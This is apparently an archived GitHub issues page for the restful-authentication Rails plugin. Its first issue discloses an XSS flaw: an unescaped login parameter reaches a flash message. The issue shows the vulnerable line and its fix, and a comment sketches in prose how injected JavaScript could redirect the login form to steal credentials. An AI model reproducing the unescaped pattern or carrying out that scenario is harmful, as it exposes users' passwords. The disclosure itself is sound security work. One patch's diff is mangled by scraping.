technoweenie / restful-authentication

Click here to lend your support to: restful-authentication and make a donation at www.pledgie.com !

Generates common user authentication code for Rails/Merb, with a full test/unit and rspec suite and optional Acts as State Machine support built-in. — Read more

Sort by: Priority | Votes | Last Updated

Loading…

1.

0 votes

note_failed_signin unescaped string
4 comments Created 7 months ago by mikeycgto

Title

Body
Line 40 of the note_failed_signin in generators / authenticated / templates / controller.rb flash[:error] = "Couldn't log you in as '#{params[:login]}'" Is unescaped and could lead to a potential XSS attack where an attacker could steal the users credentials. It should be: flash[:error] = "Couldn't log you in as '#{CGI.escapeHTML(params[:login])}'"
or cancel

Line 40 of the note_failed_signin in generators / authenticated / templates / controller.rb

flash[:error] = "Couldn't log you in as '#{params[:login]}'"

Is unescaped and could lead to a potential XSS attack where an attacker could steal the users credentials. It should be:

flash[:error] = "Couldn't log you in as '#{CGI.escapeHTML(params[:login])}'"

Comments

saizai Sun May 10 19:49:09 -0700 2009 | link

Yes-but:
a) you should be escaping your flashes at the view level anyway (rather than trusting to do it on every insertion)
b) h() is easier :-p
c) is there a situation where someone could insert to another user's flash, given that this gets added to the current session? They'd just attack themselves.

Comment
Yes-but: a) you should be escaping your flashes at the view level anyway (rather than trusting to do it on every insertion) b) h() is easier :-p c) is there a situation where someone could insert to another user's flash, given that this gets added to the current session? They'd just attack themselves.
or cancel

mikeycgto Mon May 11 07:05:30 -0700 2009 | link

Yeah true, using h() would be easier. I often have my application template display flash error and warn and escaping them wouldn't be an issue. Some users may not want to escape every flash notice\warn however.

The way I envisioned an attack using this vulnerability was that an attacker would create a special link on some rouge page. This link would POST to the login page of the vulnerable application. The login parameter would be some JavaScript, which would in turn, alter the forms actions to point to the attacker's page. The attacker now can collect credentials and further more devise an attack that does not disrupt service or alert the user in anyway.

Comment
Yeah true, using h() would be easier. I often have my application template display flash error and warn and escaping them wouldn't be an issue. Some users may not want to escape every flash notice\warn however. The way I envisioned an attack using this vulnerability was that an attacker would create a special link on some rouge page. This link would POST to the login page of the vulnerable application. The login parameter would be some JavaScript, which would in turn, alter the forms actions to point to the attacker's page. The attacker now can collect credentials and further more devise an attack that does not disrupt service or alert the user in anyway.
or cancel

saizai Mon May 11 07:12:13 -0700 2009 | link

Hm, interesting attack scenario. Seems unlikely IMO, but also, everything should be prevented.

I think this is more an argument for (a) - you should treat the flash as tainted in your view, and escape or whitelist it appropriately.

However, it certainly doesn't hurt to escape it as you suggest. ;-)

Comment
Hm, interesting attack scenario. Seems unlikely IMO, but also, everything should be prevented. I think this is more an argument for (a) - you should treat the flash as tainted in your view, and escape or whitelist it appropriately. However, it certainly doesn't hurt to escape it as you suggest. ;-)
or cancel

mikeycgto Mon May 11 07:15:15 -0700 2009 | link

I just come from the school of thought that it should be default, out of the box secure, with no extra user intervention or anything.

It is an easier enough fix as well, one extra method call the problem is no longer present.

Comment
I just come from the school of thought that it should be default, out of the box secure, with no extra user intervention or anything. It is an easier enough fix as well, one extra method call the problem is no longer present.
or cancel

Parsed with GitHub Flavored Markdown
2.

2 votes

database session store
1 comment Created 7 months ago by egavgabgi

Title

Body
Hi, I am pretty new to Rails although I have been learning it for the past 2 months. I am having trouble using the mysql database active record session store with this plug-in. I keep getting the following error when I try to log-in: ActionController::InvalidAuthenticityToken in SessionsController#create . And each time I go to the login page or any other page for that matter, it creates a new session entry in the sessions table. How can i get the database session store to work properly? I am using rails 2.3.2. Any help would be useful!
or cancel

Hi, I am pretty new to Rails although I have been learning it for the past 2 months. I am having trouble using the mysql database active record session store with this plug-in. I keep getting the following error when I try to log-in: ActionController::InvalidAuthenticityToken in SessionsController#create . And each time I go to the login page or any other page for that matter, it creates a new session entry in the sessions table. How can i get the database session store to work properly? I am using rails 2.3.2.

Any help would be useful!

Comments

Sylvain Wed Jul 08 06:28:44 -0700 2009 | link

Hi, I have exactly the same problem with rails 2.3.2. I can't find any solution on the web for that point.

Comment
Hi, I have exactly the same problem with rails 2.3.2. I can't find any solution on the web for that point.
or cancel

Parsed with GitHub Flavored Markdown
3.

0 votes

missed issue in documentation
0 comments Created 5 months ago by alec-c4

Title

Body
Hi, you have missed issue in installation instructions, that users should add line "include AuthenticatedSystem" to the application controller. Could you correct it plz?
or cancel

Hi,
you have missed issue in installation instructions, that users should add line "include AuthenticatedSystem" to the application controller. Could you correct it plz?

Comments

Parsed with GitHub Flavored Markdown
4.

0 votes

Master branch broken create user method
0 comments Created 4 months ago by remear

Title

Body
NoMethodError in UsersController#create undefined method `name' for #<User:0x23b5400> This is caused by validations in user.rb for :name since the name field is not part of the initial migration. validates_format_of :name, :with => Authentication.name_regex, :message => Authentication.bad_name_message, :allow_nil => true validates_length_of :name, :maximum => 100 Removing these lines fixes the issue.
or cancel

NoMethodError in UsersController#create

undefined method `name' for #<User:0x23b5400>

This is caused by validations in user.rb for :name since the name field is not part of the initial migration.

validates_format_of :name, :with => Authentication.name_regex, :message => Authentication.bad_name_message, :allow_nil => true
validates_length_of :name, :maximum => 100

Removing these lines fixes the issue.

Comments

Parsed with GitHub Flavored Markdown
5.

0 votes

remember_me will never work?
0 comments Created about 1 month ago by jfqd

Title

Body
Am I wrong or will remember_me never work? In my opinion two lines are missing in 'by_cookie_token.rb' file (see patch): Index: restful_authentication/lib/authentication/by_cookie_token.rb =================================================================== --- restful_authentication/lib/authentication/by_cookie_token.rb +++ restful_authentication/lib/authentication/by_cookie_token.rb @@ -42,8 +42,10 @@ # refresh token (keeping same expires_at) if it exists def refresh_token if remember_token? - self.remember_token = self.class.make_token - save(false) + self.remember_token = self.class.make_token + save(false) + else + remember_me end end
or cancel
Am I wrong or will remember_me never work? In my opinion two lines are missing in 'by_cookie_token.rb' file (see patch):

Index: restful_authentication/lib/authentication/by_cookie_token.rb

--- restful_authentication/lib/authentication/by_cookie_token.rb +++ restful_authentication/lib/authentication/by_cookie_token.rb @@ -42,8 +42,10 @@
```
   # refresh token (keeping same expires_at) if it exists
   def refresh_token
     if remember_token?
```
- ```
   self.remember_token = self.class.make_token 
```
- ```
   save(false)      
```
- ```
   self.remember_token = self.class.make_token
```
- ```
   save(false)
```
- ```
 else
```
- ```
   remember_me
 end
```
  end
Comments

Parsed with GitHub Flavored Markdown
6.

1 vote

Move to Gemcutter?
0 comments Created about 1 month ago by harking

Title

Body
Do you plan on moving restful-authentication to gemcutter?
or cancel

Do you plan on moving restful-authentication to gemcutter?

Comments

Parsed with GitHub Flavored Markdown
7.

0 votes

Cucumber issues
1 comment Created 23 days ago by metasoarous

Title

Body
I just set up restful_auth with the cucumber tests on rails 2.3.5 and Ruby 1.9 and found that the user step Then /^she should +see an? (\w+) message '([\w !\']+)'$/ do |notice, message| response.should have_flash(notice, %r{#{message}}) end should be Then /^she should +see an? (\w+) message '([\w !\']+)'$/ do |notice, message| response.should have_flash(notice, :content => %r{#{message}}) end for things to work. Don't know if something changed recently that would have this work before but not now, but it all goes back to the have_flash which depends on have_tag, which in turn (so far as I can tell) looks for content if you send in content through a hash. Perhaps it used to look for any second argument as though it were content, but if so it is doing so wonkily now.
or cancel
I just set up restful_auth with the cucumber tests on rails 2.3.5 and Ruby 1.9 and found that the user step
```
Then /^she should +see an? (\w+) message '([\w !\']+)'$/ do |notice, message|
  response.should have_flash(notice, %r{#{message}})
end
```
should be
```
Then /^she should +see an? (\w+) message '([\w !\']+)'$/ do |notice, message|
  response.should have_flash(notice, :content => %r{#{message}})
end
```
for things to work. Don't know if something changed recently that would have this work before but not now, but it all goes back to the have_flash which depends on have_tag, which in turn (so far as I can tell) looks for content if you send in content through a hash. Perhaps it used to look for any second argument as though it were content, but if so it is doing so wonkily now.
Comments

metasoarous Sat Dec 12 15:38:26 -0800 2009 | link

Okay, I goofed here - sending in %r{#{message}} through hash assignment to the :content key doesn't actually work - that effectively just checks whether or not there is a "div.#{notice}" tag somewhere in the returned html. I'm wrestling with a bunch of strange issues and I'll post as I figure more out.

Comment
Okay, I goofed here - sending in %r{#{message}} through hash assignment to the :content key doesn't actually work - that effectively just checks whether or not there is a "div.#{notice}" tag somewhere in the returned html. I'm wrestling with a bunch of strange issues and I'll post as I figure more out.
or cancel

Parsed with GitHub Flavored Markdown
8.

0 votes

removed installation instructions as submodule
0 comments Created 20 days ago by minalecs

Title

Body
not sure why it was removed, but now it just says either use git clone git://github.com/technoweenie/restful-authentication.git restful_authentication or rename the plugin’s directory to be restful_authentication after fetching it. previously had instructions to add as submodule if using git. git submodule add git://github.com/technoweenie/restful-authentication.git vendor/plugins/restful_authentication
or cancel

not sure why it was removed, but now it just says
either use git clone git://github.com/technoweenie/restful-authentication.git restful_authentication
or rename the plugin’s directory to be restful_authentication after fetching it.

previously had instructions to add as submodule if using git.
git submodule add git://github.com/technoweenie/restful-authentication.git vendor/plugins/restful_authentication

Comments

Parsed with GitHub Flavored Markdown

Labels

technoweenie / restful-authentication

Pledgie Donations

Comments

Comments

Comments

Comments

Index: restful_authentication/lib/authentication/by_cookie_token.rb

Comments

Comments

Comments

Comments